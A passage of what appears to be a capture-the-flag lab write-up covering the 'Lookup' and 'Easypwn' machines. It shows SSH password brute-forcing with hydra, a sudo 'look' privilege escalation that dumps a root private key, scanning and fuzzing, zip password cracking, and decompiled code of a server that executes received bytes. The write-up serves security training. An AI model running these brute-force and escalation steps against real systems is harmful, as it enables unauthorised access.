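    printf("caller: %s\n", who ? who : "(unknown)");
    return 0;
}
```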
Next, use this as a wordlist and brute-force the password with hydra
┌──(root㉿zss)-[/]
└─# hydra -l think -P lookup.txt ssh://192.168.1.105 -V -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-19 21:55:42
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 49 login tries (l:1/p:49), ~4 tries per task
[DATA] attacking ssh://192.168.1.105:22/
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose1006" - 1 of 49 [child 0] (0/0)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose1004" - 2 of 49 [child 1] (0/0)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose1002" - 3 of 49 [child 2] (0/0)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose1001teles" - 4 of 49 [child 3] (0/0)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose100190" - 5 of 49 [child 4] (0/0)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose10001" - 6 of 49 [child 5] (0/0)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose10.asd" - 7 of 49 [child 6] (0/0)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose10+" - 8 of 49 [child 7] (0/0)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose0_07" - 9 of 49 [child 8] (0/0)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose0990" - 10 of 49 [child 9] (0/0)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose0986$" - 11 of 49 [child 10] (0/0)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose098130443" - 12 of 49 [child 11] (0/0)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose0981" - 13 of 49 [child 12] (0/0)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose0924" - 14 of 49 [child 13] (0/0)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose0923" - 15 of 49 [child 14] (0/0)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose0921" - 16 of 49 [child 15] (0/0)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "thepassword" - 17 of 52 [child 7] (0/3)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose(1993)" - 18 of 52 [child 0] (0/3)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose'sbabygurl" - 19 of 52 [child 1] (0/3)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose&vane" - 20 of 52 [child 14] (0/3)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose&takie" - 21 of 52 [child 5] (0/3)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose&samantha" - 22 of 52 [child 4] (0/3)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose&pam" - 23 of 52 [child 2] (0/3)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose&jlo" - 24 of 52 [child 6] (0/3)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose&jessica" - 25 of 52 [child 8] (0/3)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose&jessi" - 26 of 52 [child 12] (0/3)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "josemario.AKA(think)" - 27 of 52 [child 10] (0/3)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose.medina." - 28 of 52 [child 13] (0/3)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose.mar" - 29 of 52 [child 3] (0/3)
[22][ssh] host: 192.168.1.105 login: think password: josemario.AKA(think)
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-19 21:55:49
The password is josemario.AKA(think)
┌──(root㉿zss)-[/]
└─# ssh think@192.168.1.105
The authenticity of host '192.168.1.105 (192.168.1.105)' can't be established.
ED25519 key fingerprint is SHA256:Ndgax/DOZA6JS00F3afY6VbwjVhV2fg5OAMP9TqPAOs.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.105' (ED25519) to the list of known hosts.
think@192.168.1.105's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-156-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed 19 Mar 2025 02:00:11 PM UTC
System load: 0.0 Processes: 207
Usage of /: 58.7% of 9.75GB Users logged in: 0
Memory usage: 39% IPv4 address for enp0s17: 192.168.1.105
Swap usage: 0%
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.
https://ubuntu.com/engage/secure-kubernetes-at-the-edge
Expanded Security Maintenance for Applications is not enabled.
7 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
New release '22.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Thu Jan 11 20:17:32 2024 from 192.168.1.13
think@lookup:~$ ls
user.txt
think@lookup:~$ cat user.txt
38375fb4dd8baa2b2039ac03d92b820e
Privilege escalation - root flag
think@lookup:~$ sudo -l
[sudo] password for think:
Matching Defaults entries for think on lookup:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User think may run the following commands on lookup:
(ALL) /usr/bin/look
The root flag can be read directly (look with an empty prefix prints every line of the file, and sudo runs it as root):
think@lookup:~$ sudo look '' /root/root.txt
5a285a9f257e45c68bb6c9f9f57d18e8
The root SSH private key can be read the same way and then used to log in with ssh:
think@lookup:~$ sudo look '' /root/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
But logging in with the private key still asked me for a password. I asked Kimi, and this is what it said:
This is because the permissions on your private key file are wrong. The ssh client requires the private key to be readable and writable only by its owner, i.e. mode 600. Your private key is 644, meaning other users can read it as well, which is a security risk, so the ssh client ignores the key and falls back to asking you for a password.
To fix this, change the permissions of the private key file with the following command:
chmod 600 id
After that the private key satisfies the ssh client's requirements and later ssh connections using it will not prompt for a password, provided the server already has this user's public key configured correctly.
So the file permissions were wrong and had to be changed to owner-only (mode 600); after that the login works:
┌──(root㉿zss)-[/]
└─# ssh root@192.168.1.105 -i id
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-156-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed 19 Mar 2025 02:13:47 PM UTC
System load: 0.01 Processes: 207
Usage of /: 58.7% of 9.75GB Users logged in: 0
Memory usage: 39% IPv4 address for enp0s17: 192.168.1.105
Swap usage: 0%
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.
https://ubuntu.com/engage/secure-kubernetes-at-the-edge
Expanded Security Maintenance for Applications is not enabled.
7 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
New release '22.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Wed Sep 11 09:24:50 2024
root@lookup:~$ ls
total 40K
drwx------ 5 root root 4.0K Apr 2 2024 .
drwxr-xr-x 19 root root 4.0K Jan 11 2024 ..
lrwxrwxrwx 1 root root 9 Jun 2 2023 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3.2K Jan 11 2024 .bashrc
drwx------ 2 root root 4.0K Jan 11 2024 .cache
-rwxrwx--- 1 root root 66 Jan 11 2024 cleanup.sh
drwxr-xr-x 3 root root 4.0K Jun 21 2023 .local
-rw-r--r-- 1 root root 161 Jan 11 2024 .profile
-rw-r----- 1 root root 33 Jan 11 2024 root.txt
lrwxrwxrwx 1 root root 9 Jul 31 2023 .selected_editor -> /dev/null
drwx------ 2 root root 4.0K Jan 11 2024 .ssh
-rw-rw-rw- 1 root root 3.1K Apr 2 2024 .viminfo
root@lookup:~$ cat root.txt
5a285a9f257e45c68bb6c9f9f57d18e8
Easypwn
Information gathering
The IP address is 192.168.56.110
┌──(root㉿zss)-[/home/zss/桌面/clash-for-linux-master]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:79:ea:cb, IPv4: 192.168.56.108
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:17 (Unknown: locally administered)
192.168.56.100 08:00:27:42:8a:a5 PCS Systemtechnik GmbH
192.168.56.110 08:00:27:65:55:68 PCS Systemtechnik GmbH
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.021 seconds (126.67 hosts/sec). 3 responded
Gather port information
┌──(root㉿zss)-[/home/zss/桌面/clash-for-linux-master]
└─# nmap -p- 192.168.56.110
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-20 18:57 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.110
Host is up (0.0047s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
6666/tcp open irc
MAC Address: 08:00:27:65:55:68 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 13.56 seconds
┌──(root㉿zss)-[/home/zss/桌面/clash-for-linux-master]
└─# nmap -sV -sT -sC 192.168.56.110 -p 80,6666
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-20 19:06 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.110
Host is up (0.0017s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.59 ((Debian))
|_http-server-header: Apache/2.4.59 (Debian)
|_http-title: Don't Hack Me
6666/tcp open tcpwrapped
MAC Address: 08:00:27:65:55:68 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.81 seconds
Seeing the service on port 6666, I searched for tcpwrapped and found a vulnerability that could be exploited, but it did not work
msf6 > search tcpwrapped
[-] No results from search
msf6 > search rsh_login
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/rservices/rsh_login . normal No rsh Authentication Scanner
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/rservices/rsh_login
msf6 > use 0
msf6 auxiliary(scanner/rservices/rsh_login) > show options
Module options (auxiliary/scanner/rservices/rsh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
ANONYMOUS_LOGIN false yes Attempt to login with a blank username and password
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
CreateSession true no Create a new session for every successful login
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user, user&re
alm)
ENABLE_STDERR false yes Enables connecting the stderr port
FROMUSER no The username to login from
FROMUSER_FILE /usr/share/metasploit-framework/data/wordlists/ no File containing from usernames, one per line
rservices_from_users.txt
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
metasploit.html
RPORT 514 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/rservices/rsh_login) > info
Name: rsh Authentication Scanner
Module: auxiliary/scanner/rservices/rsh_login
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
jduck <jduck@metasploit.com>
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
ANONYMOUS_LOGIN false yes Attempt to login with a blank username and password
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
CreateSession true no Create a new session for every successful login
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user, user&rea
lm)
ENABLE_STDERR false yes Enables connecting the stderr port
FROMUSER no The username to login from
FROMUSER_FILE /usr/share/metasploit-framework/data/wordlists/ no File containing from usernames, one per line
rservices_from_users.txt
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-m
etasploit.html
RPORT 514 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
Description:
This module will test a shell (rsh) service on a range of machines and
report successful logins.
NOTE: This module requires access to bind to privileged ports (below 1024).
References:
https://nvd.nist.gov/vuln/detail/CVE-1999-0651
https://nvd.nist.gov/vuln/detail/CVE-1999-0502
View the full module info with the info -d command.
msf6 auxiliary(scanner/rservices/rsh_login) > set rhosts 192.168.56.110
rhosts => 192.168.56.110
msf6 auxiliary(scanner/rservices/rsh_login) > set rport 6666
rport => 6666
msf6 auxiliary(scanner/rservices/rsh_login) > run
[*] 192.168.56.110:6666 - 192.168.56.110:6666 - Starting rsh sweep
[*] 192.168.56.110:6666 - 192.168.56.110:6666 - Attempting rsh with username '' from 'root'
[-] 192.168.56.110:6666 - 192.168.56.110:6666 - Result: ackers, get out of my machine [*] 等待客户端连接...
[*] 192.168.56.110:6666 - 192.168.56.110:6666 - Attempting rsh with username '' from 'daemon'
[-] 192.168.56.110:6666 - Unable to connect: The destination is invalid: (192.168.56.110:6666).
[*] 192.168.56.110:6666 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/rservices/rsh_login) > sessions
Active sessions
===============
No active sessions.
msf6 auxiliary(scanner/rservices/rsh_login) > info
Name: rsh Authentication Scanner
Module: auxiliary/scanner/rservices/rsh_login
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
jduck <jduck@metasploit.com>
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
ANONYMOUS_LOGIN false yes Attempt to login with a blank username and password
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
CreateSession true no Create a new session for every successful login
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user, user&rea
lm)
ENABLE_STDERR false yes Enables connecting the stderr port
FROMUSER no The username to login from
FROMUSER_FILE /usr/share/metasploit-framework/data/wordlists/ no File containing from usernames, one per line
rservices_from_users.txt
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS 192.168.56.110 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-m
etasploit.html
RPORT 6666 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
Description:
This module will test a shell (rsh) service on a range of machines and
report successful logins.
NOTE: This module requires access to bind to privileged ports (below 1024).
References:
https://nvd.nist.gov/vuln/detail/CVE-1999-0651
https://nvd.nist.gov/vuln/detail/CVE-1999-0502
View the full module info with the info -d command.
msf6 auxiliary(scanner/rservices/rsh_login) > set PASS_FILE /home/zss/字典/1000_passwd.txt
PASS_FILE => /home/zss/字典/1000_passwd.txt
msf6 auxiliary(scanner/rservices/rsh_login) > set USERPASS_FILE /home/zss/字典/Seclist/SecLists-master/Usernames/Names/names.txt
USERPASS_FILE => /home/zss/字典/Seclist/SecLists-master/Usernames/Names/names.txt
msf6 auxiliary(scanner/rservices/rsh_login) > exploit
[*] 192.168.56.110:6666 - 192.168.56.110:6666 - Starting rsh sweep
[*] 192.168.56.110:6666 - 192.168.56.110:6666 - Attempting rsh with username 'aaliyah' from 'root'
[-] 192.168.56.110:6666 - 192.168.56.110:6666 - Result: ackers, get out of my machine
[*] 192.168.56.110:6666 - 192.168.56.110:6666 - Attempting rsh with username 'aaliyah' from 'daemon'
[-] 192.168.56.110:6666 - 192.168.56.110:6666 - Result: ackers, get out of my machine
[*] 192.168.56.110:6666 - 192.168.56.110:6666 - Attempting rsh with username 'aaliyah' from 'bin'
[-] 192.168.56.110:6666 - 192.168.56.110:6666 - Result: ackers, get out of my machine
[*] 192.168.56.110:6666 - 192.168.56.110:6666 - Attempting rsh with username 'aaliyah' from 'nobody'
[-] 192.168.56.110:6666 - Unable to connect: The destination is invalid: (192.168.56.110:6666).
[*] 192.168.56.110:6666 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
dirsearch found nothing, so switch to gobuster
┌──(root㉿kali-plus)-[/usr/share/seclists/Discovery/Web-Content]
└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.56.110/ -x.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.110/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/mysecret.txt (Status: 200) [Size: 383]
/server-status (Status: 403) [Size: 279]
Progress: 441118 / 441120 (100.00%)
===============================================================
Finished
===============================================================
Found mysecret.txt, curl it
┌──(root㉿kali-plus)-[~]
└─# curl http://192.168.56.110/mysecret.txt
Go to the most evil port.
You will get what you want.
Please be gentle with him, maybe he will be afraid.
In order to obtain its source code.
Perhaps you will need the dictionary below.
/YTlPX4d2UENbWnI.txt
curl again
┌──(root㉿kali-plus)-[~]
└─# curl http://192.168.56.110/YTlPX4d2UENbWnI.txt
ta0
lingmj
bamuwe
todd
ll104567
primary
lvzhouhang
qiaojojo
flower
Use these as a wordlist to fuzz directories
┌──(root㉿kali-plus)-[~]
└─# wfuzz -w easypwn.txt -u http://192.168.56.110/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.110/FUZZ
Total requests: 9
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 404 9 L 31 W 276 Ch "ta0"
000000003: 404 9 L 31 W 276 Ch "bamuwe"
000000007: 404 9 L 31 W 276 Ch "lvzhouhang"
000000009: 404 9 L 31 W 276 Ch "flower"
000000008: 404 9 L 31 W 276 Ch "qiaojojo"
000000002: 404 9 L 31 W 276 Ch "lingmj"
000000004: 404 9 L 31 W 276 Ch "todd"
000000006: 404 9 L 31 W 276 Ch "primary"
000000005: 200 2902 L 27928 W 700694 Ch "ll104567"
Total time: 0
Processed Requests: 9
Filtered Requests: 0
Requests/sec.: 0
Fuzzing found the /ll104567 directory. Visiting it downloads a file; file identifies it as a zip archive, but unzip asks for a password.
Download it to the host and brute-force it with archpr; the password is oooooo. Unzipping yields an opt directory containing a file called server. That is rather cumbersome, though. At this point someone will ask: streamer, streamer, your way does work, but it is too clumsy, is there a simpler and faster way? Yes there is, brother, and there are nine more like it:
┌──(root㉿kali-plus)-[~/easypwn]
└─# zip2john ll104567.zip > tmp
ver 2.0 efh 5455 efh 7875 ll104567.zip/opt/server PKZIP Encr: TS_chk, cmplen=739398, decmplen=2120576, crc=1B8B19DF ts=4118 cs=4118 type=8
┌──(root㉿kali-plus)-[~/easypwn]
└─# john tmp --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
oooooo (ll104567.zip/opt/server)
1g 0:00:00:00 DONE (2025-03-20 21:50) 16.66g/s 546133p/s 546133c/s 546133C/s 123456..eatme1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(root㉿kali-plus)-[~/easypwn]
└─# john tmp -show
ll104567.zip/opt/server:oooooo:opt/server:ll104567.zip::ll104567.zip
1 password hash cracked, 0 left
zip2john is faster and more convenient. The file obtained, however, appears to be a binary.
user flag
Open it in IDA, locate main, and paste main's code into DeepSeek:
int __fastcall main(int argc, const char **argv, const char **envp)
{
__int64 v3; // rdx
__int64 v5; // rax
std::ostream *v6; // rax
std::ostream *v7; // rax
std::ostream *v8; // rax
size_t v9; // rax
std::ostream *v10; // rax
char buf[4108]; // [rsp+0h] [rbp-1070h] BYREF
int v12; // [rsp+100Ch] [rbp-64h] BYREF
__int16 v13[2]; // [rsp+1010h] [rbp-60h] BYREF
int v14; // [rsp+1014h] [rbp-5Ch]
void (*v15)(void); // [rsp+1028h] [rbp-48h]
char *v16; // [rsp+1030h] [rbp-40h]
char v17; // [rsp+103Fh] [rbp-31h]
char *v18; // [rsp+1040h] [rbp-30h]
__int64 *v19; // [rsp+1048h] [rbp-28h]
unsigned __int64 len; // [rsp+1050h] [rbp-20h]
unsigned int v21; // [rsp+1058h] [rbp-18h]
unsigned int fd; // [rsp+105Ch] [rbp-14h]
char *v23; // [rsp+1060h] [rbp-10h]
int i; // [rsp+1068h] [rbp-8h]
bool v25; // [rsp+106Fh] [rbp-1h]
ssignal(11LL, signal_handler, envp);
ssignal(13LL, signal_handler, v3);
v12 = 1;
fd = socket(2LL, 1LL, 0LL);
if ( fd )
{
if ( (unsigned int)setsockopt(fd, 1LL, 2LL, &v12, 4LL) )
{
perror(&unk_53C044);
close(fd);
return 1;
}
else
{
v13[0] = 2;
v14 = 0;
v13[1] = ntohs(6666LL);
if ( (int)bind(fd, v13, 16LL) >= 0 )
{
if ( (int)listen(fd, 5LL) >= 0 )
{
v5 = std::operator<<<std::char_traits<char>>((std::ostream *)&std::cout);
v6 = (std::ostream *)std::ostream::operator<<(v5, 6666LL);
v7 = (std::ostream *)std::operator<<<std::char_traits<char>>(v6);
std::endl<char,std::char_traits<char>>(v7);
while ( 1 )
{
while ( 1 )
{
v8 = (std::ostream *)std::operator<<<std::char_traits<char>>((std::ostream *)&std::cout);
std::endl<char,std::char_traits<char>>(v8);
v21 = accept(fd, 0LL, 0LL);
if ( (v21 & 0x80000000) == 0 )
break;
perror(&unk_53C0C9);
}
dup2(v21, 0LL);
dup2(v21, 1LL);
dup2(v21, 2LL);
close(v21);
len = read(0, buf, 0x1000uLL);
v25 = (__int64)len > 0;
for ( i = 0; v25 && (__int64)len > i; ++i )
{
v19 = &forbidden_bytes;
v23 = (char *)&forbidden_bytes;
v18 = (char *)&forbidden_bytes + 7;
while ( 1 )
{
if ( v23 == v18 )
goto LABEL_20;
v17 = *v23;
if ( v17 == buf[i] )
break;
++v23;
}
v25 = 0;
LABEL_20:
if ( !v25 )
break;
}
if ( !v25 )
{
v16 = "Hackers, get out of my machine\n";
v9 = j_strlen_ifunc("Hackers, get out of my machine\n");
write(1u, v16, v9);
close(v21);
}
else
{
v15 = (void (*)(void))mmap64(0LL, len, 7uLL, 0x22uLL, 0xFFFFFFFFuLL, 0LL);
if ( v15 == (void (*)(void))-1LL )
{
perror("[!] 内存映射失败");
close(v21);
}
else
{
j_memcpy(v15, buf, len);
v15();
munmap(v15, len);
